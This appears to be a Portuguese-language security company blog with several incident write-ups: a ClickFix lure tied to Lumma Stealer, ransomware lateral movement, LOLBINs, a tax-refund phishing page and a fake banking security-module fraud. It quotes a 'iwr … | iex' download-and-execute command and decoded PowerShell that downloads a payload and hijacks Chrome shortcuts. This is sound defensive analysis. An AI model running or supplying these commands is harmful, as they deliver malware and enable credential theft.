Categoria: Fraude

Vol. 1 No. 20250725-792 (2025)

Um clique, um comando, uma brecha

Yuri Augusto | yuri@cylo.com.br | 25/07/2025

Como já é de conhecimento geral, o elo mais fraco em um ataque é a interferência humana, seja em caso de falhas (bugs), phishing ou engenharia social.
Em um caso recente, o usuário tentou executar um arquivo malicioso e teve a ação bloqueada. Ao verificar o hash do arquivo suspeito (localizado em uma pasta temporária) no Virus Total, o arquivo foi identificado como Powershell.
Em seguida, busquei por comandos que pudessem ter sido executados anteriormente para gerar esse arquivo na pasta temporária. Nem sempre é possível recuperar o histórico de comandos do Powershell, mas neste caso encontrei o seguinte registro no arquivo ConsoleHost_history.txt, localizado em AppData:

iwr walkin[.]college/trace.mp3 | iex # You're Human

Além disso, identifiquei também comandos altamente ofuscados executados pelo .NET . Nesse ponto, já era evidente que se tratava de um ataque de engenharia social relativamente novo: o ClearFake/ClickFix. Nesse tipo de ataque, o usuário acessa um site e é induzido a abrir o menu “Executar” do Windows, colar um código e pressionar Enter. Trata-se, basicamente, de uma variação de phishing com o uso de captcha para dar aparência de legitimidade.

Exemplo de como é realizado o ataque.

Apesar de relativamente recente, esse tipo de ataque já vem sendo amplamente utilizado por diversas famílias de malware.

Gráfico das infecções semanais em 2025.

O sucesso desse ataque se deve à sua simplicidade. O usuário é induzido a digitar, por conta própria, o código malicioso, facilitando o ponto de entrada na estação. A partir daí, o código é executado e inicia-se o download de arquivos maliciosos.
Realizei uma busca na internet e encontrei o script utilizado, bem como a metodologia do ataque. Há indícios de que o malware pertença à família Lumma Stealer.

Algumas maneiras de detectar a atividade maliciosa:

  • Eventos de segurança – eventID 4668 (process creation): procurar instâncias do powershell.exe que tenha explorer.exe como processo pai e que apresente associação com o EventID 4663 (object access) envolvendo arquivos na pasta %LocalAppData%\Microsoft\Windows\WinX\
  • Padrões de uso de shell: identificar sessões elevadas de powershell com comunicações suspeitas ou criação de processos incomuns, como certutil.exe, mshta.exe ou rundll32.exe.

Algumas maneiras para dificultar o roubo de credenciais:

  • Habilitar autenticação multifator (MFA).
  • Adotar métodos de autenticação resistentes à phishing, como FIDO, passkey, e evitar métodos de autenticação SMS.
  • Utilizar AppLocker para restringir aplicações não autorizadas no ambiente.
  • Desabilitar powershell para usuários que não possuem privilégios administrativos.

Felizmente o ataque não chegou a esse ponto, pois foi barrado pelo XDR. No entanto, isso nos alerta para uma das estratégias mais básicas, treinar os usuários, que são os principais alvos dos atacantes. Não se espera que o usuário entenda códigos ou saiba reconhecer ataques, porém, com orientações básicas é possível evitar problemas significativamente mais graves.

Indicators of compromise:
SHA256 – 45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d
Domínio – walkin[.]college/trace.mp3

Mais informações do indicador:
https://www.virustotal.com/gui/file/45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d
https://hybrid-analysis.com/sample/45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d/6882e7fcd6da29a55105d6ab

Referências:
https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/

Vol. 1 No. 20250612-636 (2025)

Como o Ransomware se Espalha Dentro da Sua Rede

Pedro Brandt Zanqueta | pedro@cylo.com.br | 12/06/2025

Ajudando em uma resposta a incidente, recentemente tivemos que lidar com um determinado grupo de ransomware que atrapalhou uma empresa por um período. Com isso decidi detalhar como geralmente um ataque ocorre.

Ponto de partida

Imagine uma manhã comum na sua empresa. Os colaboradores chegam e iniciam suas atividades. Tudo parece normal até que, um e-mail aparentemente inofensivo chega à caixa de entrada de um colaborador do setor financeiro. O assunto é: “Nota Fiscal em Atraso – URGENTE”. Sem nem desconfiar, o funcionário clica no anexo.

O anexo executa um script em PowerShell, que baixa e executa um payload malicioso. Em segundos, o atacante já acesso à rede. Mas o objetivo não é apenas comprometer uma máquina é paralisar a empresa inteira. E para isso, o ransomware precisa se espalhar.

Descoberta do ambiente

Antes de se mover, o atacante precisa entender o ambiente. Ele começa com técnicas de reconhecimento interno. Utiliza comandos para descobrir sistemas remotos, identificar conexões de rede, e localizar compartilhamentos acessíveis.

Com essas informações em mãos, o atacante sabe exatamente onde estão os servidores de arquivos, os controladores de domínio e as estações mais críticas.

Movimentação lateral

Para se mover lateralmente, o atacante precisa de credenciais. Com Mimikatz usa para extrair senhas da memória do processo LSASS. Se tiver sorte, encontra credenciais de administradores de domínio. Caso contrário, ele pode recorrer a ataques de força bruta ou password spray para comprometer outras contas.

Usando ferramentas como PsExec ou WMI, o ransomware começa a se espalhar. Ele cópia seus arquivos para máquinas remotas usando compartilhamentos administrativos e executa o payload silenciosamente.

Se encontrar vulnerabilidades conhecidas, como EternalBlue, ele pode explorá-las diretamente, sem depender de credenciais.

Garantindo a Persistência

Para garantir que o ransomware continue ativo mesmo após reinicializações, o atacante cria tarefas agendadas ou serviços maliciosos.

Processo Final

Quando o atacante sente que já comprometeu o suficiente, ele inicia a fase final: a criptografia. Utilizando algoritmos robustos, o ransomware bloqueia arquivos em servidores, estações de trabalho e até backups conectados.

Em minutos, a empresa inteira está paralisada. Um aviso aparece nas telas: “Seus arquivos foram criptografados. Pague em Bitcoin para recuperá-los.”

Melhorias no ambiente

  • Segmentação de rede: impede que o atacante se mova livremente.
  • Monitoramento de credenciais: detecta uso anômalo de contas.
  • Atualizações regulares: fecham portas exploradas por vulnerabilidades.
  • Treinamento de usuários: reduz o risco de phishing.
  • Soluções de segurança avançadas: como EDRs e SIEMs, ajudam a detectar e responder rapidamente.

Conclusão

O ransomware não é apenas um vírus que aparece do nada. Ele é o resultado de uma cadeia de ações cuidadosamente planejadas.

A pergunta não é se sua empresa será alvo, mas quando. E quando isso acontecer, o quão preparado você estará?

Vol. 1 No. 20250423-381 (2025)

LOLBIN Windows

Pedro Brandt Zanqueta | pedro@cylo.com.br | 23/04/2025

Nos últimos dias trabalhamos em cima de um incidente relacionado a um executável assinado dentro do sistema operacional Microsoft Windows interagindo com agentes maliciosos, sim é isso mesmo que leu, um aplicativo oficial da Microsoft sendo utilizado como parte de um ataque, essa é a teoria dos LOLBIN (Living Off the Land Binaries).

O ataque trabalhado utilizava do LOLBIN PowerShell.exe para transferir os arquivos e persistência no host. Já passou em nossas mãos por exemplo o serviço BITS (Background Intelligent Transfer Service) ao qual é responsável por gerenciar os pacotes de rede que são solicitados pelo sistema operacional, nesse serviço também é passível de ocorrer a mesma situação.

Fica uma recomendação, acompanhem esse projeto mantido pela comunidade chamado LOLBAS Project. Estão focados em manter uma lista de aplicativos dentro do Microsoft Windows que é comum ser utilizados em ataques, com detalhes sabemos comandos e parâmetros que utilizam para passar por times de segurança e ferramentas despreparadas.

Referências:

https://lolbas-project.github.io

Vol. 1 No. 20250415-321 (2025)

Phishing no Imposto de Renda

João Fuzinelli | joao@cylo.com.br | 15/04/2025

Com a chegada da necessidade da declaração brasileira de imposto de renda temos visto o início campanhas de phishing tentando persuadir pessoas físicas a realizarem pagamentos inadequados.

O e-mail leva o usuário para uma página falsa do governo brasileiro solicitando o CPF da pessoa.

Ao inserir os números do CPF o site falso inicia um carregamento como se estivesse fazendo uma busca a Receita Federal brasileira

Em seguida mostra uma p´´agina como se o CPF consultado estivesse devedor e em caso de não pagamento poderia ocasionar uma série de multas

Ao clicar no botão regularizar o site simula que está realizando os cálculos e gera um extrato do que deve ser pago

Ao pedir para gerar a Darf o site traz a data atual para pagamento e um contador regressivo impondo urgência

Até o exato momento 15-04-2025 21:02 o QRCode do pix não carregou e aparentemente os botões estão quebrados

Recomendamos atenção a ataques relacionados ao assunto, bem como tentativas de fraude por telefone

Vol. 1 No. 20250404-122 (2025)

A Armadilha do Módulo Falso

João Fuzinelli | joao@cylo.com.br | 04/04/2025

Nas últimas semanas, deparamo-nos com uma fraude envolvendo uma entidade financeira, que ocorreu da seguinte maneira: por meio de uma ligação telefônica, o fraudador solicitava que a vítima acessasse o site abaixo:

O site entrava em um modo de ‘aguarde’ e, ao examinarmos o código, identificamos o seguinte caminho:

/diagnostico

O site sempre apresentava um erro de validação, pois o fraudador alegava, durante a conversa, que era necessário atualizar o módulo de segurança.

Ao clicar no botão ‘Instalar Módulo Mais Recente’, era iniciado o download de um arquivo .exe, que o navegador marcava como não confiável. Já no botão ‘Copiar Código de Segurança’, era fornecida uma linha de comando codificada em Base64. Ao realizar o decode, obtive o seguinte resultado em alguns blocos:

Força a parada do processo Chrome:

Stop-Process -Name “chrome” -Force

Instala um módigo do 7zip para powershell

If(-not(Get-InstalledModule 7Zip4Powershell -ErrorAction silentlycontinue)){
Install-Module 7Zip4Powershell -Confirm:$False -Force
}

Realiza o download de um arquivo denominado plugin.zip

Invoke-WebRequest “https:/XYZ[.]COM/download?file=plugin[.]zip” -OutFile “$env:APPDATA\plugin.zip”

Coloca o valor da senha em uma variavel para descomprimir o arquivo zip

$Secure_String_Pwd = ConvertTo-SecureString “@Wrs304093” -AsPlainText -Force

Cria um arquivo .lnk na área de trabalho

ForEach ($folder in $special_folders) {
If (([Environment]::GetFolderPath(“$folder”)) -ne “”) {
$path = [Environment]::GetFolderPath(“$folder”)
$shortcut_name = “\Google Chrome.lnk”
If ([System.IO.File]::Exists(“$($path)$($shortcut_name)”)) {
$obj = New-Object -comObject WScript.Shell;
$lnk = $obj.CreateShortcut(“$($path)$($shortcut_name)”);
$lnk.Arguments = “$arg”;
$lnk.Save();
}

Por fim, o site realizava o download do módulo de segurança original e dava continuidade ao processo, simulando uma atualização legítima. Estou monitorando as atividades do nosso servidor infectado para obter mais informações.